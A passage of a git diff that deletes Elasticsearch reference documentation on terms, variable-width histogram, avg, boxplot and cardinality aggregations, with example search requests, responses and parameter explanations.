already completed. For this -reason, they cannot be used for ordering. - -======================================= - -It is also possible to order the buckets based on a "deeper" aggregation in the hierarchy. This is supported as long -as the aggregations path are of a single-bucket type, where the last aggregation in the path may either be a single-bucket -one or a metrics one. If it's a single-bucket type, the order will be defined by the number of docs in the bucket (i.e. `doc_count`), -in case it's a metrics one, the same rules as above apply (where the path must indicate the metric name to sort by in case of -a multi-value metrics aggregation, and in case of a single-value metrics aggregation the sort will be applied on that value). - -The path must be defined in the following form: - -// {wikipedia}/Extended_Backus%E2%80%93Naur_Form -[source,ebnf] --------------------------------------------------- -AGG_SEPARATOR = '>' ; -METRIC_SEPARATOR = '.' 
; -AGG_NAME = ; -METRIC = ; -PATH = [ , ]* [ , ] ; --------------------------------------------------- - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "countries": { - "terms": { - "field": "artist.country", - "order": { "rock>playback_stats.avg": "desc" } - }, - "aggs": { - "rock": { - "filter": { "term": { "genre": "rock" } }, - "aggs": { - "playback_stats": { "stats": { "field": "play_count" } } - } - } - } - } - } -} --------------------------------------------------- - -The above will sort the artist's countries buckets based on the average play count among the rock songs. - -Multiple criteria can be used to order the buckets by providing an array of order criteria such as the following: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "countries": { - "terms": { - "field": "artist.country", - "order": [ { "rock>playback_stats.avg": "desc" }, { "_count": "desc" } ] - }, - "aggs": { - "rock": { - "filter": { "term": { "genre": "rock" } }, - "aggs": { - "playback_stats": { "stats": { "field": "play_count" } } - } - } - } - } - } -} --------------------------------------------------- - -The above will sort the artist's countries buckets based on the average play count among the rock songs and then by -their `doc_count` in descending order. - -NOTE: In the event that two buckets share the same values for all order criteria the bucket's term value is used as a -tie-breaker in ascending alphabetical order to prevent non-deterministic ordering of buckets. - -==== Minimum document count - -It is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "tags": { - "terms": { - "field": "tags", - "min_doc_count": 10 - } - } - } -} --------------------------------------------------- - -The above aggregation would only return tags which have been found in 10 hits or more. Default value is `1`. - - -Terms are collected and ordered on a shard level and merged with the terms collected from other shards in a second step. However, the shard does not have the information about the global document count available. The decision if a term is added to a candidate list depends only on the order computed on the shard using local shard frequencies. The `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the term as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. This might cause many (globally) high frequent terms to be missing in the final result if low frequent terms populated the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. However, this increases memory consumption and network traffic. - -`shard_min_doc_count` parameter - -The parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or not with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the `shard_min_doc_count`. 
If your dictionary contains many low frequent terms and you are not interested in those (for example misspellings), then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a reasonable certainty not reach the required `min_doc_count` even after merging the local counts. `shard_min_doc_count` is set to `0` per default and has no effect unless you explicitly set it. - - - -NOTE: Setting `min_doc_count`=`0` will also return buckets for terms that didn't match any hit. However, some of - the returned terms which have a document count of zero might only belong to deleted documents or documents - from other types, so there is no warranty that a `match_all` query would find a positive document count for - those terms. - -WARNING: When NOT sorting on `doc_count` descending, high values of `min_doc_count` may return a number of buckets - which is less than `size` because not enough data was gathered from the shards. Missing buckets can be - back by increasing `shard_size`. - Setting `shard_min_doc_count` too high will cause terms to be filtered out on a shard level. This value should be set much lower than `min_doc_count/#shards`. - -[[search-aggregations-bucket-terms-aggregation-script]] -==== Script - -Generating the terms using a script: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { - "script": { - "source": "doc['genre'].value", - "lang": "painless" - } - } - } - } -} --------------------------------------------------- - -This will interpret the `script` parameter as an `inline` script with the default script language and no script parameters. To use a stored script use the following syntax: - -////////////////////////// - -[source,console] --------------------------------------------------- -POST /_scripts/my_script -{ - "script": { - "lang": "painless", - "source": "doc[params.field].value" - } -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { - "script": { - "id": "my_script", - "params": { - "field": "genre" - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -==== Value Script - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { - "field": "genre", - "script": { - "source": "'Genre: ' +_value", - "lang": "painless" - } - } - } - } -} --------------------------------------------------- - -==== Filtering Values - -It is possible to filter the values for which buckets will be created. This can be done using the `include` and -`exclude` parameters which are based on regular expression strings or arrays of exact values. Additionally, -`include` clauses can filter using `partition` expressions. - -===== Filtering Values with regular expressions - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "tags": { - "terms": { - "field": "tags", - "include": ".*sport.*", - "exclude": "water_.*" - } - } - } -} --------------------------------------------------- - -In the above example, buckets will be created for all the tags that has the word `sport` in them, except those starting -with `water_` (so the tag `water_sports` will not be aggregated). 
The `include` regular expression will determine what -values are "allowed" to be aggregated, while the `exclude` determines the values that should not be aggregated. When -both are defined, the `exclude` has precedence, meaning, the `include` is evaluated first and only then the `exclude`. - -The syntax is the same as <>. - -===== Filtering Values with exact values - -For matching based on exact values the `include` and `exclude` parameters can simply take an array of -strings that represent the terms as they are found in the index: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "JapaneseCars": { - "terms": { - "field": "make", - "include": [ "mazda", "honda" ] - } - }, - "ActiveCarManufacturers": { - "terms": { - "field": "make", - "exclude": [ "rover", "jensen" ] - } - } - } -} --------------------------------------------------- - -===== Filtering Values with partitions - -Sometimes there are too many unique terms to process in a single request/response pair so -it can be useful to break the analysis up into multiple requests. -This can be achieved by grouping the field's values into a number of partitions at query-time and processing -only one partition in each request. -Consider this request which is looking for accounts that have not logged any access recently: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "expired_sessions": { - "terms": { - "field": "account_id", - "include": { - "partition": 0, - "num_partitions": 20 - }, - "size": 10000, - "order": { - "last_access": "asc" - } - }, - "aggs": { - "last_access": { - "max": { - "field": "access_date" - } - } - } - } - } -} --------------------------------------------------- - -This request is finding the last logged access date for a subset of customer accounts because we -might want to expire some customer accounts who haven't been seen for a long while. -The `num_partitions` setting has requested that the unique account_ids are organized evenly into twenty -partitions (0 to 19). and the `partition` setting in this request filters to only consider account_ids falling -into partition 0. Subsequent requests should ask for partitions 1 then 2 etc to complete the expired-account analysis. - -Note that the `size` setting for the number of results returned needs to be tuned with the `num_partitions`. -For this particular account-expiration example the process for balancing values for `size` and `num_partitions` would be as follows: - -1. Use the `cardinality` aggregation to estimate the total number of unique account_id values -2. Pick a value for `num_partitions` to break the number from 1) up into more manageable chunks -3. Pick a `size` value for the number of responses we want from each partition -4. Run a test request - -If we have a circuit-breaker error we are trying to do too much in one request and must increase `num_partitions`. -If the request was successful but the last account ID in the date-sorted test response was still an account we might want to -expire then we may be missing accounts of interest and have set our numbers too low. 
We must either - -* increase the `size` parameter to return more results per partition (could be heavy on memory) or -* increase the `num_partitions` to consider less accounts per request (could increase overall processing time as we need to make more requests) - -Ultimately this is a balancing act between managing the Elasticsearch resources required to process a single request and the volume -of requests that the client application must issue to complete a task. - -==== Multi-field terms aggregation - -The `terms` aggregation does not support collecting terms from multiple fields -in the same document. The reason is that the `terms` agg doesn't collect the -string term values themselves, but rather uses -<> -to produce a list of all of the unique values in the field. Global ordinals -results in an important performance boost which would not be possible across -multiple fields. - -There are two approaches that you can use to perform a `terms` agg across -multiple fields: - -<>:: - -Use a script to retrieve terms from multiple fields. This disables the global -ordinals optimization and will be slower than collecting terms from a single -field, but it gives you the flexibility to implement this option at search -time. - -<>:: - -If you know ahead of time that you want to collect the terms from two or more -fields, then use `copy_to` in your mapping to create a new dedicated field at -index time which contains the values from both fields. You can aggregate on -this single field, which will benefit from the global ordinals optimization. - -[[search-aggregations-bucket-terms-aggregation-collect]] -==== Collect mode - -Deferring calculation of child aggregations - -For fields with many unique terms and a small number of required results it can be more efficient to delay the calculation -of child aggregations until the top parent-level aggs have been pruned. Ordinarily, all branches of the aggregation tree -are expanded in one depth-first pass and only then any pruning occurs. -In some scenarios this can be very wasteful and can hit memory constraints. -An example problem scenario is querying a movie database for the 10 most popular actors and their 5 most common co-stars: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "actors": { - "terms": { - "field": "actors", - "size": 10 - }, - "aggs": { - "costars": { - "terms": { - "field": "actors", - "size": 5 - } - } - } - } - } -} --------------------------------------------------- - -Even though the number of actors may be comparatively small and we want only 50 result buckets there is a combinatorial explosion of buckets -during calculation - a single actor can produce n² buckets where n is the number of actors. The sane option would be to first determine -the 10 most popular actors and only then examine the top co-stars for these 10 actors. This alternative strategy is what we call the `breadth_first` collection -mode as opposed to the `depth_first` mode. - -NOTE: The `breadth_first` is the default mode for fields with a cardinality bigger than the requested size or when the cardinality is unknown (numeric fields or scripts for instance). 
-It is possible to override the default heuristic and to provide a collect mode directly in the request: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "actors": { - "terms": { - "field": "actors", - "size": 10, - "collect_mode": "breadth_first" <1> - }, - "aggs": { - "costars": { - "terms": { - "field": "actors", - "size": 5 - } - } - } - } - } -} --------------------------------------------------- - -<1> the possible values are `breadth_first` and `depth_first` - -When using `breadth_first` mode the set of documents that fall into the uppermost buckets are -cached for subsequent replay so there is a memory overhead in doing this which is linear with the number of matching documents. -Note that the `order` parameter can still be used to refer to data from a child aggregation when using the `breadth_first` setting - the parent -aggregation understands that this child aggregation will need to be called first before any of the other child aggregations. - -WARNING: Nested aggregations such as `top_hits` which require access to score information under an aggregation that uses the `breadth_first` -collection mode need to replay the query on the second pass but only for the documents belonging to the top buckets. - -[[search-aggregations-bucket-terms-aggregation-execution-hint]] -==== Execution hint - -There are different mechanisms by which terms aggregations can be executed: - - - by using field values directly in order to aggregate data per-bucket (`map`) - - by using global ordinals of the field and allocating one bucket per global ordinal (`global_ordinals`) - -Elasticsearch tries to have sensible defaults so this is something that generally doesn't need to be configured. - -`global_ordinals` is the default option for `keyword` field, it uses global ordinals to allocates buckets dynamically -so memory usage is linear to the number of values of the documents that are part of the aggregation scope. - -`map` should only be considered when very few documents match a query. Otherwise the ordinals-based execution mode -is significantly faster. By default, `map` is only used when running an aggregation on scripts, since they don't have -ordinals. - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "tags": { - "terms": { - "field": "tags", - "execution_hint": "map" <1> - } - } - } -} --------------------------------------------------- - -<1> The possible values are `map`, `global_ordinals` - -Please note that Elasticsearch will ignore this execution hint if it is not applicable and that there is no backward compatibility guarantee on these hints. - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "tags": { - "terms": { - "field": "tags", - "missing": "N/A" <1> - } - } - } -} --------------------------------------------------- - -<1> Documents without a value in the `tags` field will fall into the same bucket as documents that have the value `N/A`. - -==== Mixing field types - -WARNING: When aggregating on multiple indices the type of the aggregated field may not be the same in all indices. 
-Some types are compatible with each other (`integer` and `long` or `float` and `double`) but when the types are a mix -of decimal and non-decimal number the terms aggregation will promote the non-decimal numbers to decimal numbers. -This can result in a loss of precision in the bucket values. diff --git a/docs/reference/aggregations/bucket/variablewidthhistogram-aggregation.asciidoc b/docs/reference/aggregations/bucket/variablewidthhistogram-aggregation.asciidoc deleted file mode 100644 index 1109a505b27..00000000000 --- a/docs/reference/aggregations/bucket/variablewidthhistogram-aggregation.asciidoc +++ /dev/null @@ -1,98 +0,0 @@ -[[search-aggregations-bucket-variablewidthhistogram-aggregation]] -=== Variable width histogram aggregation -++++ -Variable width histogram -++++ - -experimental::["This functionality is experimental and may be changed or removed completely in a future release. Elastic will take a best effort approach to fix any issues, but experimental features are not subject to the support SLA of official GA features. We're evaluating the request and response format for this new aggregation.",https://github.com/elastic/elasticsearch/issues/58573] - -This is a multi-bucket aggregation similar to <>. -However, the width of each bucket is not specified. Rather, a target number of buckets is provided and bucket intervals -are dynamically determined based on the document distribution. This is done using a simple one-pass document clustering algorithm -that aims to obtain low distances between bucket centroids. Unlike other multi-bucket aggregations, the intervals will not -necessarily have a uniform width. - -TIP: The number of buckets returned will always be less than or equal to the target number. - -Requesting a target of 2 buckets. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "prices": { - "variable_width_histogram": { - "field": "price", - "buckets": 2 - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "prices": { - "buckets": [ - { - "min": 10.0, - "key": 30.0, - "max": 50.0, - "doc_count": 2 - }, - { - "min": 150.0, - "key": 185.0, - "max": 200.0, - "doc_count": 5 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -IMPORTANT: This aggregation cannot currently be nested under any aggregation that collects from more than a single bucket. - -==== Clustering Algorithm -Each shard fetches the first `initial_buffer` documents and stores them in memory. Once the buffer is full, these documents -are sorted and linearly separated into `3/4 * shard_size buckets`. -Next each remaining documents is either collected into the nearest bucket, or placed into a new bucket if it is distant -from all the existing ones. At most `shard_size` total buckets are created. - -In the reduce step, the coordinating node sorts the buckets from all shards by their centroids. Then, the two buckets -with the nearest centroids are repeatedly merged until the target number of buckets is achieved. -This merging procedure is a form of {wikipedia}/Hierarchical_clustering[agglomerative hierarchical clustering]. - -TIP: A shard can return fewer than `shard_size` buckets, but it cannot return more. 
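
To make these settings concrete, here is a sketch that sets all three parameters explicitly on the `price` field used above (the numbers are arbitrary examples; `shard_size` and `initial_buffer` are described in the sections that follow):

[source,console]
--------------------------------------------------
POST /sales/_search?size=0
{
  "aggs": {
    "prices": {
      "variable_width_histogram": {
        "field": "price",
        "buckets": 5,              <1>
        "shard_size": 250,         <2>
        "initial_buffer": 2500     <3>
      }
    }
  }
}
--------------------------------------------------
// TEST[setup:sales]

<1> Target number of buckets returned after the final reduction.
<2> Maximum number of buckets each shard may send to the coordinating node.
<3> Number of documents sampled on each shard before the initial clustering pass.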
-
-==== Shard size
-The `shard_size` parameter specifies the number of buckets that the coordinating node will request from each shard.
-A higher `shard_size` leads each shard to produce smaller buckets. This reduces the likelihood of buckets overlapping
-after the reduction step. Increasing the `shard_size` will improve the accuracy of the histogram, but it will
-also make it more expensive to compute the final result because bigger priority queues will have to be managed on a
-shard level, and the data transfers between the nodes and the client will be larger.
-
-TIP: Parameters `buckets`, `shard_size`, and `initial_buffer` are optional. By default, `buckets = 10`, `shard_size = buckets * 50`, and `initial_buffer = min(10 * shard_size, 50000)`.
-
-==== Initial Buffer
-The `initial_buffer` parameter can be used to specify the number of individual documents that will be stored in memory
-on a shard before the initial bucketing algorithm is run. Bucket distribution is determined using this sample
-of `initial_buffer` documents. So, although a higher `initial_buffer` will use more memory, it will lead to more representative
-clusters.
-
-==== Bucket bounds are approximate
-During the reduce step, the coordinating node continuously merges the two buckets with the nearest centroids. If two buckets have
-overlapping bounds but distant centroids, then it is possible that they will not be merged. Because of this, after
-reduction the maximum value in some interval (`max`) might be greater than the minimum value in the subsequent
-bucket (`min`). To reduce the impact of this error, when such an overlap occurs the bound between these intervals is adjusted to be `(max + min) / 2`.
-
-TIP: Bucket bounds are very sensitive to outliers.
diff --git a/docs/reference/aggregations/metrics.asciidoc b/docs/reference/aggregations/metrics.asciidoc
deleted file mode 100644
index e9680f8fc5b..00000000000
--- a/docs/reference/aggregations/metrics.asciidoc
+++ /dev/null
@@ -1,56 +0,0 @@
-[[search-aggregations-metrics]]
-== Metrics aggregations
-
-The aggregations in this family compute metrics based on values extracted in one way or another from the documents that
-are being aggregated. The values are typically extracted from the fields of the document (using the field data), but
-can also be generated using scripts.
-
-Numeric metrics aggregations are a special type of metrics aggregation which output numeric values. Some aggregations output
-a single numeric metric (e.g. `avg`) and are called `single-value numeric metrics aggregation`, while others generate multiple
-metrics (e.g. `stats`) and are called `multi-value numeric metrics aggregation`. The distinction between single-value and
-multi-value numeric metrics aggregations plays a role when these aggregations serve as direct sub-aggregations of some
-bucket aggregations (some bucket aggregations enable you to sort the returned buckets based on the numeric metrics in each bucket).
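
As a hedged sketch of why this distinction matters when sorting buckets (the `genre` and `play_count` field names are purely illustrative), a multi-value metrics aggregation is referenced as `name.metric`, whereas a single-value one is referenced by its name alone:

[source,console]
--------------------------------------------------
GET /_search
{
  "aggs": {
    "genres": {
      "terms": {
        "field": "genre",
        "order": { "play_stats.max": "desc" }      <1>
      },
      "aggs": {
        "play_stats": { "stats": { "field": "play_count" } }
      }
    }
  }
}
--------------------------------------------------

<1> `stats` is a multi-value metrics aggregation, so the sort key names both the aggregation and the metric. For a single-value aggregation such as `avg`, the aggregation name alone would suffice.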
- -include::metrics/avg-aggregation.asciidoc[] - -include::metrics/boxplot-aggregation.asciidoc[] - -include::metrics/cardinality-aggregation.asciidoc[] - -include::metrics/extendedstats-aggregation.asciidoc[] - -include::metrics/geobounds-aggregation.asciidoc[] - -include::metrics/geocentroid-aggregation.asciidoc[] - -include::metrics/matrix-stats-aggregation.asciidoc[] - -include::metrics/max-aggregation.asciidoc[] - -include::metrics/median-absolute-deviation-aggregation.asciidoc[] - -include::metrics/min-aggregation.asciidoc[] - -include::metrics/percentile-rank-aggregation.asciidoc[] - -include::metrics/percentile-aggregation.asciidoc[] - -include::metrics/rate-aggregation.asciidoc[] - -include::metrics/scripted-metric-aggregation.asciidoc[] - -include::metrics/stats-aggregation.asciidoc[] - -include::metrics/string-stats-aggregation.asciidoc[] - -include::metrics/sum-aggregation.asciidoc[] - -include::metrics/t-test-aggregation.asciidoc[] - -include::metrics/tophits-aggregation.asciidoc[] - -include::metrics/top-metrics-aggregation.asciidoc[] - -include::metrics/valuecount-aggregation.asciidoc[] - -include::metrics/weighted-avg-aggregation.asciidoc[] diff --git a/docs/reference/aggregations/metrics/avg-aggregation.asciidoc b/docs/reference/aggregations/metrics/avg-aggregation.asciidoc deleted file mode 100644 index 29178c6d388..00000000000 --- a/docs/reference/aggregations/metrics/avg-aggregation.asciidoc +++ /dev/null @@ -1,185 +0,0 @@ -[[search-aggregations-metrics-avg-aggregation]] -=== Avg aggregation -++++ -Avg -++++ - -A `single-value` metrics aggregation that computes the average of numeric values that are extracted from the aggregated documents. These values can be extracted either from specific numeric fields in the documents, or be generated by a provided script. - -Assuming the data consists of documents representing exams grades (between 0 -and 100) of students we can average their scores with: - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "avg_grade": { "avg": { "field": "grade" } } - } -} --------------------------------------------------- -// TEST[setup:exams] - -The above aggregation computes the average grade over all documents. The aggregation type is `avg` and the `field` setting defines the numeric field of the documents the average will be computed on. The above will return the following: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "avg_grade": { - "value": 75.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The name of the aggregation (`avg_grade` above) also serves as the key by which the aggregation result can be retrieved from the returned response. - -==== Script - -Computing the average grade based on a script: - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "avg_grade": { - "avg": { - "script": { - "source": "doc.grade.value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. 
To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "avg_grade": { - "avg": { - "script": { - "id": "my_script", - "params": { - "field": "grade" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams,stored_example_script] - -===== Value Script - -It turned out that the exam was way above the level of the students and a grade correction needs to be applied. We can use value script to get the new average: - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "avg_corrected_grade": { - "avg": { - "field": "grade", - "script": { - "lang": "painless", - "source": "_value * params.correction", - "params": { - "correction": 1.2 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "grade_avg": { - "avg": { - "field": "grade", - "missing": 10 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -<1> Documents without a value in the `grade` field will fall into the same bucket as documents that have the value `10`. - - -[[search-aggregations-metrics-avg-aggregation-histogram-fields]] -==== Histogram fields -When average is computed on <>, the result of the aggregation is the weighted average -of all elements in the `values` array taking into consideration the number in the same position in the `counts` array. - -For example, for the following index that stores pre-aggregated histograms with latency metrics for different networks: - -[source,console] --------------------------------------------------- -PUT metrics_index/_doc/1 -{ - "network.name" : "net-1", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [3, 7, 23, 12, 6] <2> - } -} - -PUT metrics_index/_doc/2 -{ - "network.name" : "net-2", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [8, 17, 8, 7, 6] <2> - } -} - -POST /metrics_index/_search?size=0 -{ - "aggs": { - "avg_latency": - { "avg": { "field": "latency_histo" } - } - } -} --------------------------------------------------- - -For each histogram field the `avg` aggregation adds each number in the `values` array <1> multiplied by its associated count -in the `counts` array <2>. Eventually, it will compute the average over those values for all histograms and return the following result: - -[source,console-result] --------------------------------------------------- -{ - ... 
- "aggregations": { - "avg_latency": { - "value": 0.29690721649 - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:test not setup] diff --git a/docs/reference/aggregations/metrics/boxplot-aggregation.asciidoc b/docs/reference/aggregations/metrics/boxplot-aggregation.asciidoc deleted file mode 100644 index 4d0c48d3527..00000000000 --- a/docs/reference/aggregations/metrics/boxplot-aggregation.asciidoc +++ /dev/null @@ -1,189 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[search-aggregations-metrics-boxplot-aggregation]] -=== Boxplot aggregation -++++ -Boxplot -++++ - -A `boxplot` metrics aggregation that computes boxplot of numeric values extracted from the aggregated documents. -These values can be generated by a provided script or extracted from specific numeric or -<> in the documents. - -The `boxplot` aggregation returns essential information for making a {wikipedia}/Box_plot[box plot]: minimum, maximum -median, first quartile (25th percentile) and third quartile (75th percentile) values. - -==== Syntax - -A `boxplot` aggregation looks like this in isolation: - -[source,js] --------------------------------------------------- -{ - "boxplot": { - "field": "load_time" - } -} --------------------------------------------------- -// NOTCONSOLE - -Let's look at a boxplot representing load time: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_boxplot": { - "boxplot": { - "field": "load_time" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] -<1> The field `load_time` must be a numeric field - -The response will look like this: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "load_time_boxplot": { - "min": 0.0, - "max": 990.0, - "q1": 165.0, - "q2": 445.0, - "q3": 725.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Script - -The boxplot metric supports scripting. For example, if our load times -are in milliseconds but we want values calculated in seconds, we could use -a script to convert them on-the-fly: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_boxplot": { - "boxplot": { - "script": { - "lang": "painless", - "source": "doc['load_time'].value / params.timeUnit", <1> - "params": { - "timeUnit": 1000 <2> - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> The `field` parameter is replaced with a `script` parameter, which uses the -script to generate values which percentiles are calculated on -<2> Scripting supports parameterized input just like any other script - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. 
To use a -stored script use the following syntax: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_boxplot": { - "boxplot": { - "script": { - "id": "my_script", - "params": { - "field": "load_time" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:latency,stored_example_script] - -[[search-aggregations-metrics-boxplot-aggregation-approximation]] -==== Boxplot values are (usually) approximate - -The algorithm used by the `boxplot` metric is called TDigest (introduced by -Ted Dunning in -https://github.com/tdunning/t-digest/blob/master/docs/t-digest-paper/histo.pdf[Computing Accurate Quantiles using T-Digests]). - -[WARNING] -==== -Boxplot as other percentile aggregations are also -{wikipedia}/Nondeterministic_algorithm[non-deterministic]. -This means you can get slightly different results using the same data. -==== - -[[search-aggregations-metrics-boxplot-aggregation-compression]] -==== Compression - -Approximate algorithms must balance memory utilization with estimation accuracy. -This balance can be controlled using a `compression` parameter: - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "load_time_boxplot": { - "boxplot": { - "field": "load_time", - "compression": 200 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> Compression controls memory usage and approximation error - -include::percentile-aggregation.asciidoc[tags=t-digest] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -GET latency/_search -{ - "size": 0, - "aggs": { - "grade_boxplot": { - "boxplot": { - "field": "grade", - "missing": 10 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:latency] - -<1> Documents without a value in the `grade` field will fall into the same bucket as documents that have the value `10`. diff --git a/docs/reference/aggregations/metrics/cardinality-aggregation.asciidoc b/docs/reference/aggregations/metrics/cardinality-aggregation.asciidoc deleted file mode 100644 index 409af6cc7df..00000000000 --- a/docs/reference/aggregations/metrics/cardinality-aggregation.asciidoc +++ /dev/null @@ -1,249 +0,0 @@ -[[search-aggregations-metrics-cardinality-aggregation]] -=== Cardinality aggregation -++++ -Cardinality -++++ - -A `single-value` metrics aggregation that calculates an approximate count of -distinct values. Values can be extracted either from specific fields in the -document or generated by a script. - -Assume you are indexing store sales and would like to count the unique number of sold products that match a query: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "type_count": { - "cardinality": { - "field": "type" - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... 
- "aggregations": { - "type_count": { - "value": 3 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Precision control - -This aggregation also supports the `precision_threshold` option: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "type_count": { - "cardinality": { - "field": "type", - "precision_threshold": 100 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> The `precision_threshold` options allows to trade memory for accuracy, and -defines a unique count below which counts are expected to be close to -accurate. Above this value, counts might become a bit more fuzzy. The maximum -supported value is 40000, thresholds above this number will have the same -effect as a threshold of 40000. The default value is +3000+. - -==== Counts are approximate - -Computing exact counts requires loading values into a hash set and returning its -size. This doesn't scale when working on high-cardinality sets and/or large -values as the required memory usage and the need to communicate those -per-shard sets between nodes would utilize too many resources of the cluster. - -This `cardinality` aggregation is based on the -https://static.googleusercontent.com/media/research.google.com/fr//pubs/archive/40671.pdf[HyperLogLog++] -algorithm, which counts based on the hashes of the values with some interesting -properties: - - * configurable precision, which decides on how to trade memory for accuracy, - * excellent accuracy on low-cardinality sets, - * fixed memory usage: no matter if there are tens or billions of unique values, - memory usage only depends on the configured precision. - -For a precision threshold of `c`, the implementation that we are using requires -about `c * 8` bytes. 
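
For example, the default `precision_threshold` of 3000 translates to roughly `3000 * 8 = 24000` bytes, or about 24kB.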
- -The following chart shows how the error varies before and after the threshold: - -//// -To generate this chart use this gnuplot script: -[source,gnuplot] -------- -#!/usr/bin/gnuplot -reset -set terminal png size 1000,400 - -set xlabel "Actual cardinality" -set logscale x - -set ylabel "Relative error (%)" -set yrange [0:8] - -set title "Cardinality error" -set grid - -set style data lines - -plot "test.dat" using 1:2 title "threshold=100", \ -"" using 1:3 title "threshold=1000", \ -"" using 1:4 title "threshold=10000" -# -------- - -and generate data in a 'test.dat' file using the below Java code: - -[source,java] -------- -private static double error(HyperLogLogPlusPlus h, long expected) { - double actual = h.cardinality(0); - return Math.abs(expected - actual) / expected; -} - -public static void main(String[] args) { - HyperLogLogPlusPlus h100 = new HyperLogLogPlusPlus(precisionFromThreshold(100), BigArrays.NON_RECYCLING_INSTANCE, 1); - HyperLogLogPlusPlus h1000 = new HyperLogLogPlusPlus(precisionFromThreshold(1000), BigArrays.NON_RECYCLING_INSTANCE, 1); - HyperLogLogPlusPlus h10000 = new HyperLogLogPlusPlus(precisionFromThreshold(10000), BigArrays.NON_RECYCLING_INSTANCE, 1); - - int next = 100; - int step = 10; - - for (int i = 1; i <= 10000000; ++i) { - long h = BitMixer.mix64(i); - h100.collect(0, h); - h1000.collect(0, h); - h10000.collect(0, h); - - if (i == next) { - System.out.println(i + " " + error(h100, i)*100 + " " + error(h1000, i)*100 + " " + error(h10000, i)*100); - next += step; - if (next >= 100 * step) { - step *= 10; - } - } - } -} -------- - -//// - -image:images/cardinality_error.png[] - -For all 3 thresholds, counts have been accurate up to the configured threshold. -Although not guaranteed, this is likely to be the case. Accuracy in practice depends -on the dataset in question. In general, most datasets show consistently good -accuracy. Also note that even with a threshold as low as 100, the error -remains very low (1-6% as seen in the above graph) even when counting millions of items. - -The HyperLogLog++ algorithm depends on the leading zeros of 